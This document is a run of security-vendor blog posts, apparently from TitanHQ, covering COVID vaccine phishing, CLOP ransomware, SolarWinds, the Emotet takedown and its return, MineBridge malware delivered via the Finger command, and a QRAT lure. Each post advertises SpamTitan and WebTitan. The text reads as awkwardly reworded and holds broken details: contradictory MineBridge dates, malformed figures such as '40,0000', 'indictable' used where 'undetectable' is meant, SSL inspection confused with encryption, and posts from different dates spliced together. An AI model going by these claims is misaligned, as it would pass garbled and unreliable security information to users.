In the United Kingdom a previously unseen phishing campaign has been discovered focusing on UK residents that pretends to be National Health Service (NHS). The scam claim to provide recipients with the opportunity to register for a COVID-19 vaccination.
This is just one of many similar vaccine scams is to be uncovered in recent weeks. All are claiming to provide access to a vaccine in order to trick the recipient into sharing private information. From the first moments that SARS-CoV-2 virus began to be detected outside of China, hackers have been operating a wide variety of COVID-19 phishing scams. Now that the vaccine rollout is underway in the UK and worldwide, using the promise of an early vaccine as a lure it not a massive surprise.
In the most recent campaign, the sender’s address has been spoofed to make it look like the messages have been broadcast by the NHS, and NHS branding is included in the message. Recipients are informed that they have been chosen to receive the vaccine due to their family and medical history.
The lure appears authentic due to the fact that, in the UK, the majority of high-risk groups have already been vaccinated, and the NHS is now shifting into priority group 6, which is all those aged from 16-65 with an underlying medical condition. The NHS has also pleaded with people to remain patient and wait until they are contacted about the vaccine to arrange an appointment, which may be via email.
The NHS COVID-19 vaccine scam emails require the recipient to visit a hyperlink that brings them to a website where they are asked to hand over some information to confirm their identity. In this instance, the aim of the scam is not to steal credentials, but personal information including name, address, date of birth, and credit card information.
Phishing has become the main attack vector for many hacking collectives operations during the pandemic. One study points to growth of 667% in phishing as an attack vector, showing the extent to which hackers have amended their attack tactics during the pandemic. One study by Centrify shows the amount of phishing attacks had grown by 73% between March 2020 and September 2020.
Research made available by the ransomware response firm Coveware indicates that the amount of ransomware attacks using phishing as the infection vector increased sharpy in the final quarter of 2020, overtaking all other types of attack to become the main method of gaining access to business databases.
It is calculated that phishing attacks will go on rising during 2021 due to the simplicity at which they can be managed and the effectiveness of the campaigns. Attacks are also becoming more complex and more difficult for individuals to spot.
Spear phishing attacks that focus on specific companies and individuals are becoming much more popular. These campaigns include prior research, and the messages are tailored to increase the chance of a response.
With phishing so common, it is crucial for companies to see to it that they are properly safeguarded and have an email security solution in place that is capable to blocking these attacks.
Dual AV engines and sandboxing can prevent known and zero-day malware and ransomware threats, while machine learning technology and multiple threat intelligence feeds provides protection against current and emerging phishing campaigns.
SpamTitan greatly enhances protection for Microsoft Office 365 accounts, the log in details to which are highly sought after by phishers and offers companies excellent security from all email-based attacks at a very affordable cost.
If you wish to safeguard your inboxes and prevent more malicious emails, get in touch with TitanHQ for further details about SpamTitan.
TitanHQ’s powerful, yet easy to use cybersecurity solutions have been recognized at this year’s Expert Insights’ Best-Of” Awards and have been named winners in their respective categories.
Expert Insights helps organizations make the right cybersecurity decisions with confidence by providing helpful guides, expert advice, and tailored solutions. The Expert Insights’ website receives more than 40,0000 business visitors a month looking for insights into cybersecurity solutions when researching the best products to buy.
Each year, the editorial team at Expert Insights evaluates the leading cybersecurity solutions on the market based on market position, product features, the protection provided, ease of use, and how they are rated by verified users of the products. The team includes technology experts with decades of experience in the cybersecurity industry who select the top product across a wide range of categories.
TitanHQ is thrilled to announce that the ArcTitan email archiving solution, the SpamTitan email security solution, and the WebTitan web filtering solution have all been named winners of Experts Insights’ 2021 Best-Of Awards in the Email Archiving, Email Security Gateway, and Web Security categories.
“2020 was an unprecedented year of cybersecurity challenges, with a rapid rise in remote working causing a massive acceleration in cybercrime,” said Expert Insights CEO and Founder Craig MacAlpine. “Expert Insights’ Best-Of awards are designed to recognize innovative cybersecurity providers like TitanHQ that have developed powerful solutions to keep businesses safe against increasingly sophisticated cybercrime.”
All three solutions are consistently rated highly by Managed Service Providers, enterprise users, and SMB users, and are praised for their ease of implementation, ease of use, effectiveness, and price. The products often attract 5-star reviews from verified users of the Expert Insights’ website, as well as on G2 Crowd, Capterra, Google Reviews, and GetApp.
The products are offered to customers by more than 2,500 MSPs and over 8,500 businesses in 150 countries have adopted the award-winning solutions.
“The recent pandemic and the growth of remote working initiatives have further highlighted the need for multiple layers of cybersecurity and our award-winning solutions form key pillars in this security strategy,” said Ronan Kavanagh, CEO, TitanHQ. “We will continue to innovate and provide solutions that MSPs can use to deliver a consistent, secure and reliable experience to their customers.”
Since it first emerged on the scene, CLOP Ransomware the number of attacks it has been deployed in have been constantly increasing, with a major increase being experienced during October 2020.
Since that spike in the deployment of CLOP ransomware there have been many different incidents witnessed on large organizations that have been accompanied with huge ransom demands – in one particular incident a attack on Software AG came with a ransom demand issued for $20m.
Similar to many other attacks conducted by ransomware groups , the CLOP ransomware gang steals data before encrypting files. If victims have an authentic backup and try to retrieve their encrypted files without handing over the ransom requested, the group will release stolen data on the darkweb making it available to other hacking operations. The media are made aware of the data dumps, and the following coverage can lead to businesses suffering serious reputational harm. In recent months there have been many class action lawsuits reported after ransomware attacks where stolen data has been leaked over the Internet.
CLOP ransomware is thought to have been conducted by a ransomware group called FIN11, which is an off shoot of a prolific Russian cybercriminal called TA505. FIN11 has focused on many different sectors, although recently production, health and retail have been concentrated on. When attacks are launched on groups and businesses in these sectors, the losses from downtime can be significant, which increases the chances of victims handing over the ransom.
Many ransomware groups have focused on flaws in Remote Desktop Protocol, VPN solutions, and weaknesses in software and operating systems to obtain they access they need to internal networks to place ransomware. However, the first attack vector in CLOP ransomware attacks (and also many other ransomware strains) is spam email. Large scale spam campaigns are carried out, often focusing on certain industry sectors or geographical locations. These are called “spray and pray” campaigns. The hope is to obtain access to as many networks as possible. The ransomware gang can then select which businesses are worthwhile attacking with ransomware.
Once CLOP ransomware is downloaded, detection can be tricky as the threat group has programmed the ransomware to turn off antivirus software such as Microsoft Security Essentials and Windows Defender. The trick to preventing attacks is to stop the first infection, which means stopping the spam emails from reaching inboxes where they can be opened by staff.
Preventing the attacks can be done by using advanced spam filtering solution with robust antivirus protections. SpamTitan, for example, uses dual antivirus engines to catch known malware strains and sandboxing to spot dangerous files including previously unknown malware, ransomware, or malicious scripts. Machine learning processes are also used to spot new threats in real time.
The spam emails used in these campaigns try to steal details such Office 365 logins and passwords or get users to install malware downloaders. Extra protection against this phase of the attack can be supplied by a web filter such as WebTitan. WebTitan prevents the phishing component of these attacks by stopping these malicious URLs from being accessed by employees, as well as preventing downloads of malware from the Internet.
Employee training is also crucial for helping employees spot phishing emails and multi-factor authentication should be turned on to spot stolen details from being used to access email accounts and cloud apps.
If you want to enhance your security measure in the face of ransomware, malware and phishing campaigns, call the TitanHQ team now for a SpamTitan and WebTitan free trial.
Compromised email accounts take place many times around the world every day of the week and it is estimated that 2.5 billion accounts were hacked during 2019 which equates to 6.85 million accounts being hacked every day.
Cybercriminals are always searching for high value accounts that have access to high value assets and taking over an email account is the first step into compromising a database. A perfect recent example is the recent compromises of staff email account at the U.S. Treasury Department last December. The seizure of privileged user accounts did not take place due to a typical credential stuffing attack. It was actually the result of a complex software chain attack. An official statement shared by Senate Finance Committee ranking member, Ron Wyden said: “Hackers broke into systems in the Departmental Offices division of Treasury, home to the department’s highest-ranking officials.”
These hacking attempt were part of the highly-publicized SolarWinds Attack in which foreign hackers, most likely funded by the Russian government in some manner, targeted a weakness in the SolarWinds Orion monitoring and management software. This permitted the hackers to easily sign in without having to guess usernames and passwords. Due to this, the hackers could pretend to be users and operate freely within the compromised groups. Sadly, no one knows for sure what data was illegally taken or the full slate of actions carried out by the involved cybercriminals. Microsoft has revealed that they addressed the flaw exploited by the attack. Unfortunately, the hackers were able to steal as many as 18,000 government and private networks, possibly seizing user ID’s, passwords, financial records, source code and other sensitive or high value data.
Email accounts are one of the flaws that hackers often focus on. In the same manner that hackers leveraged the SolarWinds exploit to potentially break onto thousands of networks, the leveraging power of a single compromised email can lead to compounding consequences due to the fact that a single email address is connected to other user accounts, giving hackers access to other valuable databases
As politicians, regulators, cybersecurity experts and software developers try to figure out what could have been done to mitigate this attack, it is clear that there is no simple answer. Supply chain attacks are tricky to defend against since you are depending on the software vendor to safeguard their source code and platforms. In this instance, the usual recommendations would not have done anything to stop this attack.
- Groups are told to only download signed software versions, but the involved software in this incident was signed.
- Updating to the most recent software version would not have made any difference in this instance because it was the latest software version that was infiltrated.
- The attack was carried out in a highly concealed and stealthy manner and would have been indictable by everyday monitoring tactics.
The simplicity at which highly privileged user accounts within the United States government were accessed, should be a wakeup call to all businesses. In today’s highly connected and digital world, a zero-trust security strategy must be put in place.
Last year saw double the amount of phishing attacks as 2019, with the majority of organizations bing tricked and transferring large ransoms in order to retrieve their data to prevent private information from being shared publicly or sold to other hacking groups.
At the beginning of 2020, downloading data before the deployment of ransomware was still only being complete by a minority of ransomware gangs, but that trend altered as the year progressed. By December around 17 hacking groups were implementing this double extortion process and were stealing sensitive data before encrypting files. A lot of attacked groups had no option other than to pay the ransom requested in order to deal with the threat of publication of sensitive data.
The range of ransomware attacks in 2020 has been emphasised by various studies by cybersecurity experts over the past few weeks. Chainalysis recently released a report that suggests more than $350 million has been transferred to cybercriminals in 2020 alone, based on a review of the transactions to blockchain addresses known to be deployed by ransomware threat groups. Obviously that figure is likely to be much lower than the true total, as many businesses do not share that they have suffered ransomware attacks. To give that figure proper meaning, a similar review in 2019 estimated the losses to be around $90 million. Those figures are for ransom payments alone, not the cost of addressing attacks, which would be many orders of magnitude higher.
The rise in attacks can be partly put down to the change in working practices due to the pandemic. Many businesses changed from office-based working to a distributed remote workforce to prevent the spread of COVID-19 and keep their employees secured. The swift change involved hastily implementing remote access solutions to support those workers which introduced flaws that were readily exploited by ransomware group.
Measures to Take to Prevent Ransomware Attacks
What all companies and groups need to do is to make it as difficult as possible for the attacks to hit their targets. While there is no one solution for preventing ransomware attacks, there are measures that can be taken that make it much harder for the attacks to bear fruit.
With the majority of ransomware attacks now beginning with a phishing email, an advanced email security solution is a crucial. By using best-in-market solutions like SpamTitan to proactively secure the Office365 environment it will be much easier to prevent threats than simply depending on Office 365 anti-spam protections, which are commonly bypassed to transmit Trojans and ransomware.
A web filtering solution can prevent ransomware from being delivered to your systems. Multi-factor authentication must be put in place for email accounts and cloud apps, workers should be educated in how to spot threats, and monitoring systems should be enable to permit active attacks to be discovered and addressed before ransomware is launched.
During the COVID-19 pandemic there have been many new possible attack vectors for hackers to target due to the changes required of workplaces in the face of national lockdowns.
This resulted in a more spread out, remotely-based workforce. Reacting to this hackers increased their phishing attacks to try and steal log on details for email accounts, VPNs, and remote access solutions.
The rise cybercriminal campaigns was recently shown by the Anti-Phishing Working Group which has been putting together data on phishing attacks from its member groups during 2020. Its most recent report shows phishing attacks grew to more that twice that experienced during 2020, peaking in October 2020 when previous records were broken. In October, 225,304 new phishing sites were detected, compared with under 100,000 during January 2020. During the time period from August to December 2020, over 200,000 new phishing sites were discovered every month.
Links to these phishing portals are shared in large scale phishing campaigns and the majority of the messages arrive in inboxes where they are then clicked on. The pandemic resulted in it being much more simple for hackers to successfully target those seeking details about COVID-19. As the year went on COVID-19 themed lures were deployed masking as information about COVID-19 relief payments for businesses, offers of early vaccines, small business loans, tax deadline extensions, and other similar campaigns.
Hackers often create compromised websites for hosting their phishing forms, but it is now much more typical for the hackers to purchase their own domains that are tailored for each phishing campaign. These lookalike domains can easily trick people into thinking they are on a genuine site website.
Hackers have also been deploying encryption to mask their phishing URLs and fool employees. Hosting phishing URLs on HTTPS sites can trick staff into thinking the web content is authentic, and many security solutions do not review encrypted content which makes the URLs tricky to spot and block. In Q4, 2020, 84% of phishing URLs used SSL encryption.
The rise in deployment of SSL encryption is a worry, as many people mistakenly believe that a URL beginning with HTTPS is secure when that is not so. SSL inspection means the link between the browser and the website is secure, which means users are safeguarded against the interception of sensitive information, but a hacker may own or control that website. The secure connection just means other hackers will not be able to intercept login credentials as they are entered on a phishing web portal.
The issue for companies has been how to address these attacks as they increase in number and complexity. Many companies have previously depended on Office 365 anti-spam protections for preventing spam and phishing threats, but large amounts of these malicious emails are broadcast to Office 365 inboxes. When that happens and a malicious link is visited, they have no way of stopping employees from disclosing sensitive data.
One method that businesses can better safeguard their databases from these phishing attacks is by putting in place a web filtering solution that features SSL inspection. WebTitan has the ability to decrypt websites, review the content, and then re-encrypt which means hacking portals websites are not hidden and can be identified and prevented.
WebTitan also uses a range of threat intelligent feeds to see to it that once a phishing URL is discovered, all WebTitan users will be instantly protected. WebTitan makes sure that protection is in place from emerging phishing URLs and zero-minute attacks. When linked with an advanced spam filtering solution like SpamTitan to prevent phishing emails at source and ensure they do not land in inboxes, companies will be well secured from phishing attacks.
The business world has been hit very hard during 2020 due to the COVID19 pandemic, resulting in massive complications as most try to simple stay alive as a competitive entity. Complicating this even further has been the increase in ransomware attacks as cybercriminals sough to use the pandemic as leverage in their bid to steal money from anywhere possible.
Ransomware is not a new phenomenon and was first witnessed inflicting damage during the early 2000s in order to steal money from individuals and companies. It became more widespread during the 2010s and it s now the biggest cyber threat for businesses.
According to data from Kroll, during the third quarter of 2020, ransomware attacks grew by 40% with around 200 million attacks taking place during that time. Additionally a recent H1 2020 Cyber Insurance Claims Report released by Coalition states that 87% of all cyber-related insurance claims are filed due to ransomware attacks.
Another trend is that the hackers are seeking larger amounts of money in order to release the data that they are encrypting according to a report from Coveware, a firm that assists companies recovering from ransomware attacks. It says that ransom demands grew by 200% during Q4, 2019 and repeating this growth during 2020.
Ransomware gangs have created a previously unseen tactic of stealing data prior to encrypting files in order to use double extortion tactics. So even if a company pays to recover data, victims still have to hand over money to stop the public sharing of their stolen data. The healthcare industry was hit particularly hard by during the last 12 months as Healthcare systems and hospitals had to deal with fighting the pandemic at the same time as a huge increase in attacks on hospitals was registered.
The pandemic has given ransomware gangs new chance to carrying out campaign to target remote workers with new database vulnerabilities identified to exploit. COVID-19 has also been targeted using lures that share ransomware, first saying that they have new advice on the new virus, then possible cures, and latterly vaccine linked lures.
The huge rise in attacks at the back end of 2020 indicates that they will continue to rise during 2021, and there is nothing to suggest otherwise. These types of attack are likely to persist as long as they continue to be profitable so companies must take care to do everything possible to prevent all attacks.
Some of the most crucial measure to implement include:
- Configure a proven spam filter with the strongest protection against malware and ransomware. Make sure it uses signature-based detection to block known ransomware variants and sandboxing to identify new ransomware strains.
- See to it patches are applied at once and software is updated quickly to the most recent version.
- Show your employees how to spot ransomware and malware emails and conduct general security training.
- Configure a web filtering solution to prevent access to risky and malicious websites to stop installations of ransomware.
- Insist on the creation of strong passwords to obstruct brute force attacks.
- Turn on multi-factor authentication wherever it is available.
If you can spot unauthorized accessing of your databases as it occurs , you may be able to prevent an attack before ransomware is installed. Most hackers spend time moving laterally to identify as many devices as possible before deploying an attack and they will try to find and steal data, which allows you a window to detect and block the attack. You should configure a monitoring system in place that launches alerts when suspicious activity is spotted and, ideally, one that can automatically remediate attacks when they are discovered. Many attacks take place at the weekend and public holidays when monitoring by IT teams is likely to be at a lower level so think about the mechanisms you have in place when staffing levels are minimal.
You may not be able to prevent an attack, but you can ready your team(s) and restrict the damage inflicted. First and foremost, create a backup of your data. Store the backup is stored in a location that cannot be accessed from the network where the data is held, store a copy of a backup on a non-networked device, and ensure backups are carried out regularly and are checked to make sure data can be rescued.
You should also set up a disaster recovery plan that can go live as soon as an attack takes place to ensure your company can go on working until the attack is addressed.
Used in extensive attacks on companies globally for some time, the Emotet botnet has finally been taken down as part of a coordinated effort involving Europol, the FBI, the UK National Crime Agency, and other law enforcement bodies.
The cybercriminals managing Emotet used their malware to set up a backdoor to many different company databases and then sold access to other hacking groups that aimed to carry out additional malicious attacks that involved stealing sensitive data and extortion through the deployment of ransomware.
The operation has been in development for around two years and was set up to allow the multi-country infrastructure to simultaneously disrupt any attempts by the threat group to set up the network in future. Law enforcement bodies have taken management of of hundreds of servers and have taken control of the complete Emotet infrastructure, in what will be viewed by many to be the most important malware takedowns to date. The takedown has stopped the Emotet gang from using the malware and has lead to the loss of control of the army of compromised devices that comprise the botnet.
Europol and its partners were able to map the entire infrastructure, took management of the network, and shut down the Emotet Trojan. A software update was installed on the main servers used to manage the malware, two of which were located in the Netherlands. Infected computer systems will download the update, which result in the Emotet Trojan being quarantined.
Emotet is possibly the most dangerous malware of recent years and the botnet used to share it is one of the best available. Approximately 30% of all malware attacks in 2020 involved the Emotet Trojan.
Phishing emails were used to share the Emotet Trojan. Large phishing campaigns were shared using a wide variety of lures to trick recipients into opening malicious attachments or visiting websites that installed the Emotet Trojan. The lures deployed in the campaigns frequently changed, taking advantage of world events to enhance the probability of the attachments being clicked on.
Emotet began life as a banking Trojan but later evolved into a malware dropper. Emotet shared other banking Trojans such as TrickBot as the secondary malware payload, and ransomware strains such as Ryuk – each of which were also malicious.
Devices infected with Emotet are included in the botnet and used to share copies of the Emotet Trojan to other devices on the network and the user’s contacts by taking over the user’s email account. Infecting just one device on a company network that was infected with Emotet could quickly lead to more infections. The Trojan was also very complicated to remove, as removal of the infection would only be temporary, with other devices on the network simply re-infecting the cleaned device once it was removed.
Prior to the 2020 Presidential election in the United States, Microsoft and its partners were able to take over management of some of the infrastructure used to control and share the TrickBot Trojan. In that instance the operation was only temporarily successful, as the TrickBot gang was able to rapidly recover and bring its infrastructure back online.
Hacker use many tactics to steal details that they then use to remotely log onto corporate accounts, cloud services, and obtain access to business databases. Phishing is the most witnessed method, which is most commonly carried out over email.
Hackers design emails using a range of tricks to fool the recipient into visiting a malicious website where they must hand over credentials that are recorded and used by the hackers to remotely access the accounts.
Companies are now realizing the advantages of configuring an advanced spam filtering solution to prevent these phishing emails at source and ensure they do not land in inboxes. Advanced anti-spam and anti-phishing solutions will prevent practically all phishing attacks, so if you have yet to put in place such a solution or you are depending on Microsoft Office 365 protections, we urge you to get in touch and give SpamTitan a trial.
Phishing is not only carried out using email. Rather than using email to share the hook, many threat collectives use SMS or instant messaging services and increasing numbers of phishing campaigns are now being managed by telephone and these types of phishing attack are harder to prevent.
When phishing takes place via SMS messages it is known as Smishing. Instead of email, an SMS message is shared with a link that users are instructed to visit. Instant messaging platforms like WhatsApp are also used. A range of lures are in play, but it is typical for security alerts to be shared that warn the recipient about a fraudulent transaction or other security threat that depends on them them logging in to their account.
In December 2019, the U.S. Federal Bureau of Investigation (FBI) discovered a campaign where hackers were carrying out phishing campaigns using telephones – called vishing. Since then, the number of instances of vishing attacks has grown, leading to the FBI and the Cybersecurity and Infrastructure Security Agency to release a joint alert in the summer about a campaign aiming for remote workers. This month, the FBI has released another alert following a spike in vishing attacks on companies.
Hackers often target users with high levels of privileges, but not always. There has been an increasing trend for hackers to target every credential, so all users are in danger. Once one set of details is captured, efforts focus on elevating privileges and reconnaissance is carried out identify targets in the company with the level of permissions they need – I.e. permissions to perform email updates.
The hackers make VoIP calls to workers and convince them to view a webpage where they need to login. In one attack, a staff member of the firm was identified in the company’s chatroom, and was contacted and convinced to login to their group’s VPN on a fake VPN page. Credentials were obtained and used to carry outer connaissance.
How to Deal with Smishing and Vishing
Dealing with these types of phishing attacks requires a range of processes. As opposed to email phishing, these threats cannot be easily stopped at source. It is therefore crucial to cover these threats in security awareness training classes as well as warning about the dangers of email phishing.
A web filtering solution is ideal for preventing attempts to visit the malicious domains where the phishing pages are hosted. Web filters such as WebTitan can be used to manage the websites that staff members can access on their company phones and mobile devices and will supply protection no matter where an employee uses the Internet.
It is also crucial to configure multi-factor authentication to stop any stolen credentials from being implemented by hackers to remotely log on to accounts. The FBI also advises allowing network using the rule of least privilege: ensuring users are only allowed access to the resources they need for work projects. The FBI also advises regularly scanning and auditing user access rights allocated and reviewing any amendments in permissions.
During 2020, the healthcare sector was strongly concentrated on by groups of hackers who gained a benefit due to the pandemic as they attacked those dealing with hospitals administering care to those suffering from the disease.
A massive ransomware campaign targeted one of the biggest healthcare suppliers in the United States. Universal Health Services, an American Fortune 500 company which has a staff of 90,000 people and runs 400 acute care hospitals, was impacted by a huge ransomware attack in September which damaged all of its hospitals. Staff were forced to work using pen and paper for three weeks while it repaired the damage by the attack.
Another illegal infiltration of the University of Vermont Medical Center databases during October impacted over 5,000 hospital computers and laptops and 1,300 servers. All devices had to be have their data removed and have software and data installed again, with the healthcare provider suffering downtime for longer than two months. During the retrieval process around $1.5 million was being lost per day to attack-linked expenses and lost business, with the total costs thought to be more than $64 million.
Ransomware attacks on the healthcare sector increased during September and October and continued to be an issue for the sector for the rest of the year. A research study by Tenable found that ransomware attacks accounted for 46% of all healthcare data breaches in 2020, displaying the extent to which the industry was focused on.
Most of these attacks included the exploitation of unpatched flaws, most commonly flaws in the Citrix ADC controller and Pulse Connect Secure VPN. Patches had been made available the beginning of the year to fix the vulnerabilities, but the patches had not been applied swiftly. Phishing emails also gave ransomware groups the access to healthcare networks they needed to carry out ransomware attacks. Check Point’s research shows there was a 45% increase in cyberattacks on the industry from the start of November to the conclusion of the year.
Another industry heavily targeted by hackers in 2020 was retail. As many different governments issued directives for citizens to remain home to curb the spread of the virus, online retailers saw a sales surge as shoppers made their purchases online rather than in physical stores. Experts at Salesforce saw that digital sales grew by 36% in 2020 compared to the previous year, and cybercriminals took advantage of the increase in digital sales.
Many methods were used to obtain access to retailers’ systems and websites, with the most witnessed tactic being web application attacks, which increased by 800% in 2020 according to the CDNetworks State of Web Security H1 2020 Report. Hackers also used details illegally taken in previous data breaches to attack online retail outlets in credential stuffing attacks, which Akamai’s tracking revealing the retail sector was the most focused on sector industry using this attack technique, account for around 90% of attacks.
As is typical every year, the large amounts of shoppers that head online to complete purchases in the run up to Black Friday and Cyber Monday were exploited, with phishing attacks linked to these shopping events increasing thirteenfold in the six-week time period before Black Friday. In November, 1 in every 826 emails was an online shopping related phishing campaign, as opposed to 1 in 11,000 in October, according to Check Point. Content management systems used by retailers were also targeted, and attacks on retail APIs also grew during 2020.
As 2021 begins, both sectors are likely to go on being heavily focused on. Ransomware and phishing attacks on healthcare suppliers could well grow now that vaccines are being rolled out, and with many consumers still choosing to buy online rather than in person, the retail sector looks set to have another bad 12-month period.
Luckily, by using cybersecurity best practices it is possible to obstruct most of these attacks. Patches need to be applied quickly, especially any flaws in remote access software, VPNs, or popular networking equipment, as those vulnerabilities are rapidly targeted.
An advanced anti-phishing solution needs to be configured to prevent phishing attacks at source and ensure that malicious messages do not land in inboxes. Multi-factor authentication should also be put in place on email accounts and remote access solutions to obstruct credential stuffing attacks.
A web filter is vital for preventing the web-based component of phishing and cyberattacks. Web filters stop staff members from accessing malicious websites and block malware/ ransomware installations and C2 callbacks. And for retail in particular, the use of web application firewalls, safeguard transaction processing, and the proper use of Transport Layer Security across a website (HTTPS) are crucial.
By adhering to cybersecurity best practices, healthcare suppliers, retailers, and other targeted sectors will make it much harder for hackers to gain a profit. TitanHQ can help with SpamTitan Email Security and WebTitan Web Security to safeguard against email and web-based attacks in 2021. To find out more on these two products and how you can use them to safeguard your databases, call TitanHQ now.
A phishing campaign has been discovered that targets the Windows Finger command to install a malware strain called MineBridge.
The Finger command in Windows can be launched by a local user to gather a list of users on a remote machine or, alternatively, to collect data in relation to a specific remote user. The Finger utility began in the Linux and Unix operating systems but is also incorporated in Windows. The utility permits commands to see if a particular user is logged on, although this is now rarely employed.
There are security issues with the finger utility, and it has been taken advantage of previously to ascertain basic information about users that can be targeted in social engineering attacks. Weaknesses in the finger protocol have also been exploited in the past by some malware strains.
Recently, security experts discovered Finger can be deployed as a LOLBin to install malware from a remote server or to remove data without resulting in security alerts being generated. Finger is now being used in at least one phishing campaign to install malware.
MineBridge malware is a Windows backdoor composed in C++ that has previously been deployed in attacks on South Korean businesses. The malware was initially discovered in December 2020 by experts at FireEye and in January 2020 many different campaigns were identified spreading the malware via phishing emails with malicious Word files.
The most recent campaign sees the hackers pretend to be a recruitment business. The email is a recommendation of an individual for consideration for a position at the targeted company. The sender recommends that even if there are no current vacancies, the CV should be reviewed and the individual considered for a future position. The email is well written and seems genuine.
As is typical in phishing attacks, if the document is clicked a message will be shown that tells the user the document has been set up in an older version of Windows and to review the content the user must ‘enable editing’ and then ‘enable content’. Doing so will run the macro, which will install a Base64 encoded certificate using the Finger command. The certificate is a malware installer that leverages DLL hijacking to sideload the MineBridge backdoor. Once in place, MineBridge will give the hacker control over an infected device and allow a range of malicious actions to be carried out.
It is simplest to prevent attacks like this by configuring an advanced spam filtering solution to block phishing emails and stop them from reaching inboxes. As an extra security measure against this and other campaigns that target the Finger.exe utility in Windows, admins should think about disabling finger.exe if it is never employed.
Is can be tricky for staff members to spot phishing scams as the attacks typically give a plausible reason for performing an action like downloading an update, so much so that the web portals provdied are practically indistinguishable from the real websites that the scammers spoof and credentials are commonly stolen.
The pandemic has seen growing numbers of employees working from home and logging onto their company’s cloud applications remotely. Companies are now much more dependent on email for communication than when staff members were all office based. Hackers have been taking advantage and have been targeting remote workers with phishing scams and many of these attacks have been profitable.
Staff members are often given more training on cybersecurity and are warned to be wary of emails that have been sent from unrecognized people, but many still open the emails and take the desired action. The emails often pretend to bean individual that is known to the recipient, which increases the chances of that email being opened. It is also common for well known companies to be impersonated in phishing attacks, with the hackers leveraging trust in that brand.
A recent review of phishing emails by Check Point showed that the most commonly impersonated brand in phishing attacks over the past quarter is Microsoft, which is not surprising given the number of businesses using Office 365. The study revealed 43% of phishing attempts that mimic brands pretend to be Microsoft.
Microsoft details are then recorded in these attacks and are used to remotely log onto accounts. The data stored in a just one email account can be massive. There have been many healthcare phishing campaigns that have seen a single account compromised that included the sensitive data of tens of thousands or even hundreds of thousands of clients. These phishing emails are often only the first step in a multi-stage attack that gives the threat actors the base they need for a much more in depth attack on the organization, often resulting in the theft of large amounts of data and ending with the sharing of ransomware.
Microsoft is far from the only brand impersonated. The review showed that DHL is the second most impersonated brand. DHL-based phishing attacks use failed delivery alerts and shipping notices as the lure to get individuals to either share sensitive information such as login details or open malicious email attachments that install malware. 18% of all brand impersonation phishing attacks involve the impersonation of DHL. This makes sense as the phishers target companies and especially during a pandemic when there is increased reliance on courier businesses.
Other well-known companies that are commonly impersonated include PayPal and Chase to obtain account details. LinkedIn to permit professional networking accounts to be infiltrated, and Google and Yahoo are commonly impersonated to obtain account details. Attacks spoofing Amazon, Rakuten, and IKEA also feature in the top 10 most spoofed brand list.
Phishers mostly aim for company users as their credentials are far more profitable. Businesses therefore need to ensure that their phishing security measures up to date. Security awareness training for employees is important but given the realistic danger of phishing emails and the plausibility of the lures deployed, it is crucial for more reliable measures to be implemented to prevent phishing attacks.
To better secure your company from phishing campaigns, a third-party spam filter should be layered on top of Office 365. SpamTitan has been designed to supply enhanced protection for businesses that use Office 365. The solution implements easily with Office 365 and the solution is easy to configure and manage. The result will be far better security from phishing campaigns and other malicious emails that employees struggle to recognize.
For more details on SpamTitan, to sign up for a free trial, and for details of pricing, give the TitanHQ team a call now.
The Qnode Remote Access Trojan (QRAT) is currently being distributed via a Trump-themed phishing campaign, masked as a video file that claims to be a Donald Trump sex tape.
A Java-based RAT, QRAT was initially witnessed during 2015 that has been used in many different phishing campaigns over the years, with a vast increase in distribution witnessed since August 2020. Interestingly, the malicious file attachment – titled “TRUMP_SEX_SCANDAL_VIDEO.jar” – bears no resemblance to the phishing email body and subject line, which provides a loan offer for an investment for a dream project or business strategy. The subject line is “GOOD LOAN OFFER,” and the sender claims a loan will be supplied if there is a good return on the investment and between $500,000 and $100 million can be provided. It is not mentioned whether a mistake has been made and the wrong file attachment was placed in the email or if this was a deliberate mismatching of a malicious .jar file. While the emails are trick to fool many end users, there may be sufficient interest in the video to spark the interest of some recipients.
The phishing campaign seems to be poorly composed, but the same cannot be said of the malware the campaign is trying to infiltrate networks with. The recent version of QRAT shared in this campaign is more sophisticated than earlier witnessed versions, with several enhancements made to bypass security solutions. For example, the malicious code deployed as the QRAT downloader is obfuscated and split across many different buffers inside the .jar file.
Phishing campaigns often aim for interest in topical new stories and the Presidential election, claims of election fraud, and recent events at Capitol Hill have seen President Trump trending. It is possible that this will not be the only Trump-themed phishing campaign to be carried out over the coming days and months.
This campaign seems to be concentrated on companies, where the potential profits from a malware infection is likely to be far greater than an attack on consumers. Blocking threats such as this is simplest with an advanced email security solution capable of detecting known and new malware strains.
SpamTitan is an strong, inexpensive spam filtering for businesses and the leading cloud-based spam filter for managed service providers for the SMB sector. SpamTitan uses dual anti-virus engines to spot known malware threats, and a Bitdefender-powered sandbox to spot zero-day malware. The solution also supports the blocking of dangerous file types such as JARs and other executable files.
SpamTitan is excellent for preventing phishing emails without malicious attachments, including emails with hyperlinks to malicious web pages. The solution has many threat detection features that can spot and block spam and email impersonation attacks and machine learning technology and different multiple threat intelligence feeds that provide protection against zero-minute phishing campaigns.
One of the chief reasons why the solution is such as popular option for SMBs and MSPs is simple installation, use, and management. SpamTitan removes the complexity from email security to permit IT teams to focus on other key duties.
SpamTitan is the most highly rates solution on review sites such as Capterra, GetApp and Software Advice, is a top three solution in the three email security classifications on Expert Insights and has been a market leader in the G2 Email Security grids for 10 consecutive quarters.
If you would like a spam filtering solution that is strong and simple to deploy, give the TitanHQ team a call to set up a free trial of SpamTitan.
The Emotet botnet is back up and running, after an right-week absences, and has been witnessed carrying out a phishing email campaign that is sharing between 100,000 and 50,0000 emails to recipients daily.
Emotet was first tracked during 2014 and began life as a banking Trojan; however, over the years the malware has evolved. While Emotet remains a banking Trojan, it is now famous as a malware downloader that is used to send a range of secondary payloads. The malware payloads it sends also act as malware downloaders, so infection with Emotet often leads to multiple malware infections, with ransomware often shared as the final payload.
Once Emotet is downloaded on an endpoint it is added to the Emotet botnet and is used for spam and phishing attacks. Emotet sends copies of itself using email to the user’s contacts along with other self-propagation mechanisms to infiltrate other computers on the network. Emotet can be complex to remove from the network. Once one computer is managed, it is often reinfected by other infected computers on the network.
Emotet often goes inactive for many weeks or even months, but even with long gaps in operations, Emotet is still the chief malware threat. Emotet went dormant around February 2020, with activity back live five months later in July. Activity continued until late October when activity stopped once again until Tuesday this week when it came back in time for Christmas. In 2020, Emotet has been observed delivering TrickBot and other payloads like as Qakbot and ZLoader.
During the periods of inactivity, the threat actors responsible for the malware are not necessarily inactive, they just halt their distribution campaigns. During the breaks they update their malware and came back with a new and improved version that is more effective at evading security measures.
